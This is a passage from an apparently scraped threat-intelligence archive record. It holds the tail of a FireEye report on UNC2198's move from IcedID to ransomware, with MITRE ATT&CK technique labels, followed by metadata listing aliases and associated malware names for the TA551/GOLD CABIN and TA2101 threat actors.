(T1573)\r\nAsymmetric Cryptography (T1573.002)\r\nIngress Tool Transfer (T1105)\r\nProxy (T1090)\r\nMulti-hop Proxy (T1090.003)\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html" ], "report_names": [ "melting-unc2198-icedid-to-ransomware-operations.html" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c3c864b3-fac9-4d56-8500-7c06c829fbf8", "created_at": "2023-01-06T13:46:39.071873Z", "updated_at": "2026-04-10T02:00:03.203749Z", "deleted_at": null, "main_name": "TA2101", "aliases": [ "GOLD VILLAGE", "Storm-0216", "DEV-0216", "UNC2198", "TUNNEL SPIDER", "Maze Team", "TWISTED SPIDER" ], "source_name": "MISPGALAXY:TA2101", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434615, "ts_updated_at": 1775792243, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/025d817f8987c48eabd3548f89554f47abb5bbd9.pdf", "text": "https://archive.orkl.eu/025d817f8987c48eabd3548f89554f47abb5bbd9.txt", "img": "https://archive.orkl.eu/025d817f8987c48eabd3548f89554f47abb5bbd9.jpg" } }